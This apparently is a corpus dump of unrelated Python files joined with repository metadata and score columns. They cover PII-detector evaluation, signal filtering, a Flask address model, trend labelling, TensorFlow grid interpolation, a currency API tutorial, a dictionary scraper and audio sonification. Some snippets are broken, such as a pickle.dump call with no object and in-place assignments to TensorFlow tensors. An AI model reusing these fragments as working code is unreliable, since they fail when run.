results_df.columns.str.split(':').values.tolist(),
names=['filth_type', 'detector_name', 'locale'],
)
# Find filth types that have some known filth
known_types = [x[0] for x in results_df.columns if x[1] == filth_module.KnownFilth.type]
# Select columns for filth that have related known filth, but that are not known filth
detected_columns = [
x for x in results_df.columns
if x[1] != filth_module.KnownFilth.type and x[0] in known_types
]
detected_classes = results_df.loc[:, detected_columns].values
# Take the detected_columns above and find their associated known counterparts
known_cols = [(x[0], filth_module.KnownFilth.type, x[2]) for x in detected_columns]
true_classes = results_df.loc[:, known_cols].values
if not output_dict:
filth_max_length = max([len(x[0]) for x in detected_columns] + [len("filth")])
detector_name_max_length = max([len(x[1]) for x in detected_columns] + [len("detector")]) + 4
locale_max_length = max([len(x[2]) for x in detected_columns] + [len("locale")]) + 4
class_labels = [
"{} {} {} ".format(
x[0].rjust(filth_max_length),
x[1].rjust(detector_name_max_length),
x[2].rjust(locale_max_length)
)
for x in detected_columns
]
else:
class_labels = ["{}:{}:{}".format(*x) for x in detected_columns]
report_labels = []
# If there is only one label reshape the data so that
# the classification_report interprets it less ambiguously
if detected_classes.shape[1] == 1:
detected_classes = detected_classes.T[0]
true_classes = true_classes.T[0]
report_labels = [1]
else:
report_labels = [class_labels.index(x) for x in sorted(class_labels)]
class_labels = sorted(class_labels)
report = sklearn.metrics.classification_report(
true_classes,
detected_classes,
output_dict=output_dict,
zero_division=0,
target_names=class_labels,
labels=report_labels,
# **extra_args
)
if not output_dict:
report = (
'filth'.rjust(filth_max_length) +
'detector'.rjust(detector_name_max_length + 1) +
'locale'.rjust(locale_max_length + 1) +
(' '*4) +
report.lstrip(' ')
)
return report
def get_filth_dataframe(filth_list: List[Filth]) -> pd.DataFrame:
"""Produces a pandas `DataFrame` to allow debugging and improving detectors.
An example of using this is shown below:
.. code:: pycon
>>> import scrubadub, scrubadub.comparison, scrubadub.detectors.text_blob
>>> scrubber = scrubadub.Scrubber(detector_list=[
... scrubadub.detectors.TextBlobNameDetector(name='name_detector'),
... scrubadub.detectors.KnownFilthDetector([
... {'match': 'Tom', 'filth_type': 'name'},
... {'match': '<EMAIL>', 'filth_type': 'email'},
... ]),
... ])
>>> filth_list = list(scrubber.iter_filth("Hello I am Tom"))
>>> with pd.option_context("display.max_columns", 20):
... print(scrubadub.comparison.get_filth_dataframe(filth_list)) # doctest: +NORMALIZE_WHITESPACE
group_id filth_id filth_type detector_name document_name text beg end \\
0 0 0 name name_detector None Tom 11 14
<BLANKLINE>
locale known_filth comparison_type known_text known_beg known_end \\
0 en_US True NaN Tom 11 14
<BLANKLINE>
known_comparison_type exact_match partial_match true_positive \\
0 name True True True
<BLANKLINE>
false_positive false_negative
0 False False
:param filth_list: The list of detected filth
:type filth_list: A list of `Filth` objects
:return: A `pd.DataFrame` containing infomatoin about the detected `Filth`
:rtype: `pd.DataFrame`
"""
results = []
for group_id, filth_item in enumerate(filth_list):
sub_filths = [filth_item]
if isinstance(filth_item, filth_module.base.MergedFilth):
sub_filths = filth_item.filths
for filth_id, sub_filth in enumerate(sub_filths):
results.append({
'group_id': group_id,
'filth_id': filth_id,
'filth_type': sub_filth.type,
'detector_name': getattr(sub_filth, 'detector_name', float('nan')),
'document_name': getattr(sub_filth, 'document_name', float('nan')),
'text': sub_filth.text,
'beg': sub_filth.beg,
'end': sub_filth.end,
'locale': sub_filth.locale,
'known_filth': isinstance(sub_filth, filth_module.KnownFilth),
'comparison_type': getattr(sub_filth, 'comparison_type', float('nan')),
})
results_df = pd.DataFrame(results)
suffix_label = '_y_suffix'
return (
pd.merge(
results_df[~results_df['known_filth']],
results_df[results_df['known_filth']][['group_id', 'text', 'beg', 'end', 'comparison_type']],
how='outer',
left_on=('group_id', 'filth_type'),
right_on=('group_id', 'comparison_type'),
suffixes=('', suffix_label)
)
.rename(columns=lambda x: x if not x.endswith(suffix_label) else 'known_' + x[:-len(suffix_label)])
.assign(
known_filth=lambda df: ~pd.isnull(df['known_text']),
exact_match=lambda df: (df['text'] == df['known_text']).fillna(False),
partial_match=lambda df: ((df['beg'] < df['known_end']) & (df['end'] > df['known_beg']).fillna(False)),
true_positive=lambda df: (~pd.isnull(df['known_text'])) & (~pd.isnull(df['text'])),
false_positive=lambda df: (pd.isnull(df['known_text'])) & (~pd.isnull(df['text'])),
false_negative=lambda df: (~pd.isnull(df['known_text'])) & (pd.isnull(df['text'])),
)
)
def make_fake_document(
paragraphs: int = 20, locale: str = 'en_US', seed: Optional[int] = None, faker: Optional[Faker] = None,
filth_types: Optional[List[str]] = None
) -> Tuple[str, List[KnownFilthItem]]:
"""Creates a fake document containing `Filth` that needs to be removed. Also returns the list of known filth
items that are needed byt the `KnownFilthDetector`\\ .
An example of using this is shown below:
.. code:: pycon
>>> import scrubadub, scrubadub.comparison
>>> document, known_filth_items = scrubadub.comparison.make_fake_document(paragraphs=1, seed=1)
>>> scrubber = scrubadub.Scrubber()
>>> scrubber.add_detector(scrubadub.detectors.KnownFilthDetector(known_filth_items=known_filth_items))
>>> filth_list = list(scrubber.iter_filth(document))
>>> print(scrubadub.comparison.get_filth_classification_report(filth_list))
filth detector locale precision recall f1-score support
<BLANKLINE>
url url en_US 1.00 1.00 1.00 1
email email en_US 1.00 1.00 1.00 2
<BLANKLINE>
micro avg 1.00 1.00 1.00 3
macro avg 1.00 1.00 1.00 3
weighted avg 1.00 1.00 1.00 3
samples avg 1.00 1.00 1.00 3
<BLANKLINE>
:param paragraphs: The list of detected filth
:type paragraphs: int
:param locale: The locale of the documents in the format: 2 letter lower-case language code followed by an
underscore and the two letter upper-case country code, eg "en_GB" or "de_CH"
:type locale: str
:param seed: The random seed used to generate the document
:type seed: int, optional
:param faker: A Faker object that is used to generate the text
:type faker: int
:param filth_types: A list of the ``Filth.type`` to generate
:type filth_types: List[str]
:return: The document and a list of `KnownFilthItem`\\ s
:rtype: Tuple[str, List[KnownFilthItem]]
"""
if faker is None:
faker = Faker(locale=locale)
# TODO: register filth types to build up a dict that can be read from, like the detectors
possible_filth = [
filth_module.AddressFilth,
filth_module.EmailFilth,
filth_module.NameFilth,
filth_module.PhoneFilth,
filth_module.PostalCodeFilth,
filth_module.SSNFilth,
filth_module.TwitterFilth,
filth_module.UrlFilth,
]
if filth_types is not None:
possible_filth = [filth for filth in possible_filth if filth.type in filth_types]
if seed is not None:
Faker.seed(seed)
random.seed(seed)
doc = ""
known_items = [] # type: List[KnownFilthItem]
for i_paragraph in range(paragraphs):
for i_sentance_group in range(random.randint(1, 10)):
text = faker.text()
matches = list(re.finditer(r'[\s.]', text))
position = random.choice(matches)
chosen_filth = random.choice(possible_filth)
pii_text = chosen_filth.generate(faker=faker)
known_items.append({
'match': copy.copy(pii_text),
'filth_type': copy.copy(chosen_filth.type),
})
doc += (
text[:position.start()] +
position.group() +
pii_text +
position.group() +
text[position.end():]
)
doc += "\n\n"
return (doc.strip(), known_items)
| 2.515625 | 3 |
easy/1837-sum-of-digits-in-base-k.py | changmeng72/leecode_python3 | 0 | 12761468 | <filename>easy/1837-sum-of-digits-in-base-k.py
class Solution:
def sumBase(self, n: int, k: int) -> int:
r = 0
while n>0:
r += n%k
n = n//k
return r
| 3.421875 | 3 |
filter1.py | WillSmithTE/arl-eegmodels | 0 | 12761469 | <reponame>WillSmithTE/arl-eegmodels
# https://github.com/poganyg/IIR-filter
import matplotlib.pyplot as plt
import numpy as np
from IIR2Filter import IIR2Filter
from getDataAndLabels1Subj1 import getDataAndLabels, channelsSamplesTrialKernels, getConfusionMatrixNames, getNumClasses
[data, labels] = getDataAndLabels()
fs = 200
FilterMains = IIR2Filter(3,[0.5,40],'bandpass', fs=231)
# impulse = np.zeros(1000)
# impulse[0] = 1
# impulseResponse = np.zeros(len(impulse))
impulseResponse = data[0]
for i in range(len(impulseResponse)):
for j in range(len(impulseResponse[i])):
impulseResponse[i][j] = FilterMains.filter(impulseResponse[i][j])
# To obtain the frequency response from the impulse response the Fourier
# transform of the impulse response has to be taken. As it produces
# a mirrored frequency spectrum, it is enough to plot the first half of it.
freqResponse = np.fft.fft(impulseResponse)
freqResponse = abs(freqResponse[0:int(len(freqResponse)/2)])
xfF = np.linspace(0,fs/2,len(freqResponse))
plt.figure("Frequency Response")
plt.plot(xfF,np.real(freqResponse))
plt.xlabel("Frequency [Hz]")
plt.ylabel("Amplitude")
plt.title("Bandstop")
plt.show() | 3.421875 | 3 |
States/HighscoreTest.py | Nat-133/Multiplayer-Snake | 0 | 12761470 | <filename>States/HighscoreTest.py<gh_stars>0
import os
import pickle
playerNo = 1
currentPath = os.path.dirname(__file__)
newPath = os.path.relpath("\\High Scores\\highscore{}p.txt".format(playerNo),currentPath)
with open("..\\High Scores\\highscore{}p.txt".format(playerNo),"wb") as f:
highscore = pickle.dump(f)
print(highscore)
#print(os.path.relpath("..\\High Scores"),os.path.dirname(__file__))
#print(os.path.relpath("..\\High Scores\\highscore{}p.txt".format(playerNo),currentPath))
#>>>..\High Scores\highscore1p.txt
print(os.pardir)
print(currentPath)
print(newPath)
| 2.875 | 3 |
app/models/address.py | TianJin85/mall | 0 | 12761471 | # -*- encoding: utf-8 -*-
"""
@File : address.py
@Time : 2020/4/24 13:57
@Author : Tianjin
@Email : <EMAIL>
@Software: PyCharm
"""
from lin.exception import NotFound, ParameterException
from lin.interface import InfoCrud as Base
from sqlalchemy import Integer, Column, ForeignKey, String, Boolean
class Address(Base):
__tablename__ = "Address"
id = Column("id",Integer, primary_key=True, autoincrement=True, comment="收货地址id")
userId = Column("userId", Integer, ForeignKey("UserInfo.id"), nullable=False, comment="用户id")
userName = Column("userName", String(32), nullable=False, comment="用户姓名")
address = Column("address", String(250), nullable=False, comment="收货地址")
phoneCode = Column("phoneCode", String(11), nullable=False, comment="电话号码")
default = Column("default", Boolean, nullable=False, comment="默认地址")
@classmethod
def append(cls, data):
# 首次添加地址默认为True
if data["default"] == "True":
address = Address.query.filter_by(userId=data["userId"], delete_time=None, default=True).first()
if address:
address.update(
default=False,
commit=True
)
Address.create(
userId=int(data["userId"]),
userName=data["userName"],
address=data["address"],
phoneCode=data["phoneCode"],
default=True,
commit=True
)
else:
Address.create(
userId=int(data["userId"]),
userName=data["userName"],
address=data["address"],
phoneCode=data["phoneCode"],
default=False,
commit=True
)
@classmethod
def amend_default_address(cls, form):
address = Address.query.filter_by(userId=form.userId.data, delete_time=None, default=True).first()
if address:
address.update(
default=False,
commit=True
)
else:
raise NotFound(msg='没有找到相关用户')
address = Address.query.filter_by(id=form.id.data, delete_time=None).first()
if address:
address.update(
userName=form.userName.data,
address=form.address.data,
phoneCode=form.phoneCode.data,
default=True,
commit=True
)
else:
raise NotFound(msg='没有找到相关地址')
@classmethod
def address_list(cls, userId):
address = Address.query.filter_by(userId=userId, delete_time=None).all()
if address:
return address
else:
raise NotFound(msg="没有找到相关地址")
@classmethod
def delete_address(cls, id):
address = Address.query.filter_by(id=id, delete_time=None).first()
if address:
address.delete(
commit=True
)
else:
raise NotFound(msg="没有找到相关地址")
| 2.421875 | 2 |
scripts/vandv/emergence_labels.py | salmaniqbal/pyGrams | 25 | 12761472 | import numpy as np
import pandas as pd
from tqdm import tqdm
def map_prediction_to_emergence_label(results, training_values, test_values, predictors_to_run, test_terms,
emergence_linear_thresholds=(
('rapidly emergent', 0.1),
('emergent', 0.02),
('stationary', -0.02),
('declining', None)
)):
def __map_helper(normalised_counts_to_trend, predicted_emergence, predictor_name, test_term,
emergence_linear_thresholds):
if np.isnan(sum(normalised_counts_to_trend)):
predicted_emergence[predictor_name][test_term] = 'Fail'
return
x_data = range(len(normalised_counts_to_trend))
trend = np.polyfit(x_data, normalised_counts_to_trend, 1)
emergence = emergence_linear_thresholds[-1][0]
for emergence_threshold in emergence_linear_thresholds[:-1]:
if trend[0] > emergence_threshold[1]:
emergence = emergence_threshold[0]
break
predicted_emergence[predictor_name][test_term] = emergence
predicted_emergence = {}
if test_values:
predictor_name = 'Actual'
predicted_emergence[predictor_name] = {}
for test_term in tqdm(test_terms, unit='term', desc='Labelling prediction ' + predictor_name):
counts_to_trend = test_values[test_term]
max_training_value = max(training_values[test_term])
normalised_counts_to_trend = [x / max_training_value for x in counts_to_trend]
__map_helper(normalised_counts_to_trend, predicted_emergence, predictor_name, test_term,
emergence_linear_thresholds)
for predictor_name in predictors_to_run:
predicted_emergence[predictor_name] = {}
for test_term in tqdm(test_terms, unit='term', desc='Labelling prediction ' + predictor_name):
(none, configuration, predicted_values, num_training_values) = results[predictor_name][test_term]
counts_to_trend = predicted_values.ravel().tolist()
max_training_value = max(training_values[test_term])
normalised_counts_to_trend = [x / max_training_value for x in counts_to_trend]
__map_helper(normalised_counts_to_trend, predicted_emergence, predictor_name, test_term,
emergence_linear_thresholds)
return predicted_emergence
def report_predicted_emergence_labels_html(predicted_emergence, emergence_colours={
'highly emergent': 'lime',
'emergent': 'green',
'stationary': 'black',
'declining': 'red'}):
html_string = f'''
<h2>Emergence Label Prediction</h2>
'''
# df = pd.DataFrame(predicted_emergence, index=[0])
test_terms = list(predicted_emergence[list(predicted_emergence.keys())[0]].keys())
df_results = pd.DataFrame({'terms': test_terms})
predictor_display_names = []
for predictor_name in predicted_emergence:
term_results = []
for test_term in predicted_emergence[predictor_name]:
result = predicted_emergence[predictor_name][test_term]
term_results.append(result)
predictor_display_name = predictor_name.replace('-', '<br/>')
predictor_display_names.append(predictor_display_name)
df_term_column = pd.DataFrame({predictor_display_name: term_results})
df_results = df_results.join(df_term_column)
df_summary_table = df_results.style.hide_index()
df_summary_table = df_summary_table.set_table_styles([
dict(selector='table', props=[('border-collapse', 'collapse')]),
dict(selector='td', props=[('border', '2px solid black'),
('text-align', 'right'),
('padding-left', '15px'),
('padding-right', '15px')])
])
def colour_emergence(val):
colour = 'black'
if val in emergence_colours:
colour = emergence_colours[val]
return f'color: {colour}'
df_summary_table = df_summary_table.applymap(colour_emergence)
# for predictor_name in predictor_names:
# df_summary_table = df_summary_table.format({predictor_name: predictor_style})
# df_summary_table = df_summary_table.highlight_min(axis=1)
html_string += '<style type="text/css">table {border-collapse: collapse;} </style>\n'
html_string += df_summary_table.render()
return html_string
| 2.640625 | 3 |
gpflowSlim/interpolation_eager.py | jereliu/GPflow-Slim | 1 | 12761473 | <reponame>jereliu/GPflow-Slim
# Copyright 2018 <NAME>
# Copyright 2017 st--, <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.from __future__ import print_function
import tensorflow as tf
import numpy as np
from . import settings
from .kronecker import Kronecker
class GridInteprolation(object):
def __init__(
self,
base_kernel,
grid_size,
grid_bounds,
active_dims=None,
):
grid = np.zeros([len(grid_bounds), grid_size], dtype=settings.float_type)
for i in range(len(grid_bounds)):
grid_diff = float(grid_bounds[i][1] - grid_bounds[i][0]) / (grid_size - 2)
grid[i] = tf.linspace(
grid_bounds[i][0] - grid_diff,
grid_bounds[i][1] + grid_diff,
grid_size,
)
inducing_points = np.zeros([
int(pow(grid_size, len(grid_bounds))),
len(grid_bounds)
], dtype=settings.float_type)
prev_points = None
for i in range(len(grid_bounds)):
for j in range(grid_size):
inducing_points[
j * grid_size ** i:(j + 1) * grid_size ** i, i
] = grid[i, j]
if prev_points is not None:
inducing_points[
j * grid_size ** i:(j + 1) * grid_size ** i, :i
] = prev_points
prev_points = inducing_points[:grid_size ** (i + 1), :(i + 1)]
self.inducing_points = tf.constant(inducing_points)
self.grid = tf.constant(grid)
self.grid_bounds = grid_bounds
self.grid_size = grid_size
self.kernel = base_kernel
def _inducing_forward(self):
covs = []
for id in range(len(self.grid_bounds)):
cov = self.kernel.Kdim(id, tf.expand_dims(self.grid[id], 1))
covs.append(cov)
return Kronecker(covs)
def _compute_interpolation(self, inputs):
"""
:param inputs: [n, d]
:return: sparse interpolation matrix of shape [n, grid_size ** d]
"""
pass
class Interpolation(object):
def _cubic_interpolation_kernel(self, scaled_grid_dist):
"""
Computes the interpolation kernel u() for points X given the scaled
grid distances:
(X-x_{t})/s
where s is the distance between neighboring grid points. Note that,
in this context, the word "kernel" is not used to mean a covariance
function as in the rest of the package. For more details, see the
original paper Keys et al., 1989, equation (4).
scaled_grid_dist should be an n-by-g matrix of distances, where the
(ij)th element is the distance between the ith data point in X and the
jth element in the grid.
Note that, although this method ultimately expects a scaled distance matrix,
it is only intended to be used on single dimensional data.
"""
U = tf.abs(scaled_grid_dist)
res = tf.zeros_like(U, dtype=settings.tf_float)
U_lt_1 = tf.cast(tf.less(U, 1), dtype=settings.float_type)
res = res + ((1.5 * U - 2.5) * U**2 + 1) * U_lt_1
# u(s) = -0.5|s|^3 + 2.5|s|^2 - 4|s| + 2 when 1 < |s| < 2
U_ge_1_le_2 = 1 - U_lt_1 # U, if U <= 1 <= 2, 0 otherwise
res = res + (((-0.5 * U + 2.5) * U - 4) * U + 2) * U_ge_1_le_2
return res
def interpolate(self, x_grid, x_target, interp_points=range(-2, 2)):
num_grid_points = tf.shape(x_grid)[1].numpy()
num_target_points = tf.shape(x_target)[0]
num_dim = tf.shape(x_grid)[0].numpy()
num_coefficients = len(interp_points)
interp_points_flip = tf.cast(interp_points[::-1], settings.tf_float)
interp_points = tf.cast(interp_points, settings.tf_float)
interp_values = tf.ones([num_target_points, num_coefficients ** num_dim], dtype=settings.tf_float)
interp_indices = tf.zeros([num_target_points, num_coefficients ** num_dim], dtype=settings.int_type)
for i in range(num_dim):
grid_delta = x_grid[i, 1] - x_grid[i, 0]
lower_grid_pt_idxs = tf.squeeze(tf.floor((x_target[:, i] - x_grid[i, 0]) / grid_delta))
lower_pt_rel_dists = (x_target[:, i] - x_grid[i, 0]) / grid_delta - lower_grid_pt_idxs
lower_grid_pt_idxs = lower_grid_pt_idxs - tf.reduce_max(interp_points)
scaled_dist = tf.expand_dims(lower_pt_rel_dists, -1) + tf.expand_dims(interp_points_flip, -2)
dim_interp_values = self._cubic_interpolation_kernel(scaled_dist)
# Find points who's closest lower grid point is the first grid point
# This corresponds to a boundary condition that we must fix manually.
left_boundary_pts = tf.where(lower_grid_pt_idxs < 1)
num_left = tf.shape(left_boundary_pts)[0].numpy()
## only support eager mode for now.
if num_left > 0:
left_boundary_pts = tf.squeeze(left_boundary_pts, 1)
x_grid_first = tf.tile(tf.transpose(tf.expand_dims(x_grid[i, :num_coefficients], 1)), [num_left, 1])
grid_targets = tf.tile(tf.expand_dims(tf.gather(x_target[:, i], left_boundary_pts), 1), [1, num_coefficients])
dists = tf.abs(x_grid_first - grid_targets)
closest_from_first = tf.argmin(dists, 1)
for j in range(num_left):
dim_interp_values[left_boundary_pts[j], :] = 0
dim_interp_values[left_boundary_pts[j], closest_from_first[j]] = 1
lower_grid_pt_idxs[left_boundary_pts[j]] = 0
right_boundary_pts = tf.where(lower_grid_pt_idxs > num_grid_points - num_coefficients)
num_right = len(right_boundary_pts)
if num_right > 0:
right_boundary_pts = tf.squeeze(right_boundary_pts, 1)
x_grid_last = tf.tile(tf.transpose(tf.expand_dims(x_grid[i, -num_coefficients:], 1)), [num_right, 1])
grid_targets = tf.tile(tf.expand_dims(tf.gather(x_target[:, i], right_boundary_pts), 1), [1, num_coefficients])
dists = tf.abs(x_grid_last - grid_targets)
closest_from_last = tf.argmin(dists, 1)
for j in range(num_right):
dim_interp_values[right_boundary_pts[j], :] = 0
dim_interp_values[right_boundary_pts[j], closest_from_last[j]] = 1
lower_grid_pt_idxs[right_boundary_pts[j]] = num_grid_points - num_coefficients
offset = tf.expand_dims(tf.constant(interp_points) - tf.reduce_min(interp_points), -2)
dim_interp_indices = tf.expand_dims(lower_grid_pt_idxs, -1) + offset
n_inner_repeat = num_coefficients ** i
n_outer_repeat = num_coefficients ** (num_dim - i - 1)
index_coeff = num_grid_points ** (num_dim - i - 1)
dim_interp_indices = tf.tile(tf.expand_dims(dim_interp_indices, -1), [1, n_inner_repeat, n_outer_repeat])
dim_interp_values = tf.tile(tf.expand_dims(dim_interp_values, -1), [1, n_inner_repeat, n_outer_repeat])
interp_indices = interp_indices + tf.reshape(dim_interp_indices, [num_target_points, -1]) * index_coeff
interp_values = interp_values * tf.reshape(dim_interp_values, [num_target_points, -1])
return interp_indices, interp_values
| 1.671875 | 2 |
aula_api.py | davidtav/aprendendo_python | 0 | 12761474 | <filename>aula_api.py<gh_stars>0
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
#instalar bibliteca requests
# In[1]:
get_ipython().system(' pip install requests')
# In[ ]:
#importar a biblioteca requests
# In[2]:
import requests
# In[ ]:
#(url=) definição da URL a ser requisitada
#(requests.get) uso da requisição get
#(print(req.status_code)) exibe o código de status
# In[3]:
url = 'https://api.exchangerate-api.com/v6/latest'
req = requests.get(url)
print(req.status_code)
# In[ ]:
#(dados = req.json()) recuperar os dados da requisição usando o metódo json
#(print(dados)) exibe os dados requeridos
# In[4]:
dados = req.json()
print(dados)
# In[ ]:
#(valor_reais = float(input()) onde o usuario insere o valor a ser convertido
#(cotacao = dados['rates']['BRL']) recupera o valor dos dados da cotação através do [rates] na moeda Real[BRL]
#(print(f'R${valor_reais} em dólar valem US${(valor_reais/cotacao):.2f}')) exibe o valor convertido
# In[8]:
valor_reais = float(input('Informe o valor em R$ a ser convertido\n'))
cotacao = dados['rates']['BRL']
print(f'R${valor_reais} em dólar valem US${(valor_reais/cotacao):.2f}')
# In[ ]:
| 2.96875 | 3 |
tests/__main__.py | etingof/scopedconfig | 0 | 12761475 | #
# This file is part of scopedconfig software.
#
# Copyright (c) 2019, <NAME> <<EMAIL>>
# License: https://github.com/etingof/scopedconfig/blob/master/LICENSE.rst
#
import unittest
suite = unittest.TestLoader().loadTestsFromNames(
['tests.unit.__main__.suite']
)
if __name__ == '__main__':
unittest.TextTestRunner(verbosity=2).run(suite)
| 1.429688 | 1 |
py/Utility.SetData.py | mathematicalmichael/SpringNodes | 51 | 12761476 | <filename>py/Utility.SetData.py
import System
dataKey, data = IN
System.AppDomain.CurrentDomain.SetData("_Dyn_Wireless_%s" % dataKey, data) | 1.289063 | 1 |
Extrator.py | ubaierbhat/kzwebscrap | 1 | 12761477 | import json
from time import sleep
from Transliterator import transliterate_to_english
import requests
from bs4 import BeautifulSoup
path_raw = './data/raw/'
path_json = './data/json/'
url = "http://www.kashmirizabaan.com/eng_ver.php"
def query(key):
payload = f'meaning_target={key}&Submit=Go&lantype=hin&opt_dic=mat_like'
headers = {
'Connection': "keep-alive",
'Content-Type': "application/x-www-form-urlencoded",
'Accept-Language': "en,et;q=0.9,ur;q=0.8",
}
page = requests.request("POST", url, data=payload, headers=headers)
page.encoding = 'utf-8'
# cleanup
page_text = page.text
page_text = page_text.replace("<table>", '')
page_text = page_text.replace(" ", '')
page_text = page_text.replace("</br>", '<br />')
page_text = page_text.replace('<table width="717" border="0" bordercolor="#F0F0F0" bgcolor="#FFFFFF">', '<table>')
page_text = page_text.replace('<font color="#CC6600">', '')
page_text = page_text.replace('</div>\n\n</body>', '</body>')
page_text = page_text.replace('<font face="Afan_Koshur_Naksh,Afan Koshur Naksh,Times New Roman" size=4>', '')
page_text = page_text.replace('<font face=\\"Afan_Koshur_Naksh,Afan Koshur Naksh,Times New Roman\\" size=4>', '')
page_text = page_text.replace(
'<form name="dictionary" method="post" action=""onSubmit=return validate_form(this) >', '')
page_text = page_text.replace('</div></th>', '<div></div></th>')
soup = BeautifulSoup(page_text, 'lxml')
page_text = soup.prettify()
filename = get_raw_filename(key)
file = open(filename, 'w', encoding='utf-16')
file.write(page_text)
file.close()
def load(key):
filename = get_raw_filename(key)
print(filename)
file = open(filename, 'r', encoding='utf-16')
page = file.read()
file.close()
return page
def get_raw_filename(key):
filename = f'{path_raw}{key}.html'
return filename
def get_json_filename(key):
filename = f'{path_json}{key}.json'
return filename
def export_to_json(key, data):
with open(get_json_filename(key), 'w', encoding='utf-16') as fp:
json.dump(data, fp, ensure_ascii=False, indent=2)
fp.close()
def from_to_json(key):
with open(get_json_filename(key), 'r', encoding='utf-16') as fp:
data = json.load(fp)
fp.close()
return data
def for_each_key_do(action):
alfabits = '<KEY>'
for ch1 in alfabits:
for ch2 in alfabits:
key = f'{ch1}{ch2}'
x = action(key)
yield x
def fetch_data(key):
print(f'searching for {key}')
query(key)
sleep(0.25)
return 1
def transform(key):
word_count = 0
entries = []
print(f'transforming for {key}')
page = load(key)
soup = BeautifulSoup(page, 'html.parser')
tables = soup.find_all("table")
if len(tables) > 1:
for i in range(1, len(tables)):
element = tables[i]
tds = element.findAll('td')
ks_word = tds[0].getText().strip()
if ks_word == '' or ks_word == '۔۔۔':
continue
print('----------------------')
category = tds[1].getText().strip()
en_example = tds[2].getText().strip()
hi_meaning = tds[3].getText().strip()
ks_example = tds[4].getText().strip()
en_meaning = tds[5].getText().strip()
transliteration = transliterate_to_english(ks_word)
print(f'ks_word = {ks_word}')
print(f'category = {category}')
print(f'en_example = {en_example}')
print(f'hi_meaning = {hi_meaning}')
print(f'ks_example = {ks_example}')
print(f'en_meaning = {en_meaning}')
print(f'transliteration = {transliteration}')
entry = {
'ks_word': ks_word,
'category': category,
'en_example': en_example,
'ks_example': ks_example,
'en_meaning': en_meaning,
'transliteration': transliteration
}
entries.append(entry)
word_count = word_count + 1
export_to_json(key, entries)
print(f'Total number of words for {key} = {word_count}')
return word_count
| 2.890625 | 3 |
astronify/series/series.py | ceb8/astronify | 45 | 12761478 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Data Series Sonification
========================
Functionality for sonifying data series.
"""
import warnings
from inspect import signature, Parameter
import numpy as np
from astropy.table import Table, MaskedColumn
from astropy.time import Time
import pyo
from ..utils.pitch_mapping import data_to_pitch
from ..utils.exceptions import InputWarning
__all__ = ['PitchMap', 'SoniSeries']
class PitchMap():
def __init__(self, pitch_func=data_to_pitch, **pitch_args):
"""
Class that encapsulates the data value to pitch function
and associated arguments.
Parameters
----------
pitch_func : function
Optional. Defaults to `~astronify.utils.data_to_pitch`.
If supplying a function it should take a data array as the first
parameter, and all other parameters should be optional.
**pitch_args
Default parameters and values for the pitch function. Should include
all necessary arguments other than the data values.
"""
# Setting up the default arguments
if (not pitch_args) and (pitch_func == data_to_pitch):
pitch_args = {"pitch_range": [100, 10000],
"center_pitch": 440,
"zero_point": "median",
"stretch": "linear"}
self.pitch_map_func = pitch_func
self.pitch_map_args = pitch_args
def _check_func_args(self):
"""
Make sure the pitch mapping function and argument dictionary match.
Note: This function does not check the the function gets all the required arguments.
"""
# Only test if both pitch func and args are set
if hasattr(self, "pitch_map_func") and hasattr(self, "pitch_map_args"):
# Only check parameters if there is no kwargs argument
param_types = [x.kind for x in signature(self.pitch_map_func).parameters.values()]
if Parameter.VAR_KEYWORD not in param_types:
for arg_name in list(self.pitch_map_args):
if arg_name not in signature(self.pitch_map_func).parameters:
wstr = "{} is not accepted by the pitch mapping function and will be ignored".format(arg_name)
warnings.warn(wstr, InputWarning)
del self.pitch_map_args[arg_name]
def __call__(self, data):
"""
Where does this show up?
"""
self._check_func_args()
return self.pitch_map_func(data, **self.pitch_map_args)
@property
def pitch_map_func(self):
"""
The pitch mapping function.
"""
return self._pitch_map_func
@pitch_map_func.setter
def pitch_map_func(self, new_func):
assert callable(new_func), "Pitch mapping function must be a function."
self._pitch_map_func = new_func
self._check_func_args()
@property
def pitch_map_args(self):
"""
Dictionary of additional arguments (other than the data array)
for the pitch mapping function.
"""
return self._pitch_map_args
@pitch_map_args.setter
def pitch_map_args(self, new_args):
assert isinstance(new_args, dict), "Pitch mapping function args must be in a dictionary."
self._pitch_map_args = new_args
self._check_func_args()
class SoniSeries():
def __init__(self, data, time_col="time", val_col="flux"):
"""
Class that encapsulates a sonified data series.
Parameters
----------
data : `astropy.table.Table`
The table of data to be sonified.
time_col : str
Optional, default "time". The data column to be mapped to time.
val_col : str
Optional, default "flux". The data column to be mapped to pitch.
"""
self.time_col = time_col
self.val_col = val_col
self.data = data
# Default specs
self.note_duration = 0.5 # note duration in seconds
self.note_spacing = 0.01 # spacing between notes in seconds
self.gain = 0.05 # default gain in the generated sine wave. pyo multiplier, -1 to 1.
self.pitch_mapper = PitchMap(data_to_pitch)
self._init_pyo()
def _init_pyo(self):
self.server = pyo.Server()
self.streams = None
@property
def data(self):
""" The data table (~astropy.table.Table). """
return self._data
@data.setter
def data(self, data_table):
assert isinstance(data_table, Table), 'Data must be a Table.'
# Removing any masked values as they interfere with the sonification
if isinstance(data_table[self.val_col], MaskedColumn):
data_table = data_table[~data_table[self.val_col].mask]
if isinstance(data_table[self.time_col], MaskedColumn):
data_table = data_table[~data_table[self.time_col].mask]
# Removing any nans as they interfere with the sonification
data_table = data_table[~np.isnan(data_table[self.val_col])]
# making sure we have a float column for time
if isinstance(data_table[self.time_col], Time):
float_col = "asf_time"
data_table[float_col] = data_table[self.time_col].jd
self.time_col = float_col
self._data = data_table
@property
def time_col(self):
""" The data column mappend to time when sonifying. """
return self._time_col
@time_col.setter
def time_col(self, value):
assert isinstance(value, str), 'Time column name must be a string.'
self._time_col = value
@property
def val_col(self):
""" The data column mappend to putch when sonifying. """
return self._val_col
@val_col.setter
def val_col(self, value):
assert isinstance(value, str), 'Value column name must be a string.'
self._val_col = value
@property
def pitch_mapper(self):
""" The pitch mapping object that takes data values to pitch values (Hz). """
return self._pitch_mapper
@pitch_mapper.setter
def pitch_mapper(self, value):
self._pitch_mapper = value
@property
def gain(self):
""" Adjustable gain for output. """
return self._gain
@gain.setter
def gain(self, value):
self._gain = value
@property
def note_duration(self):
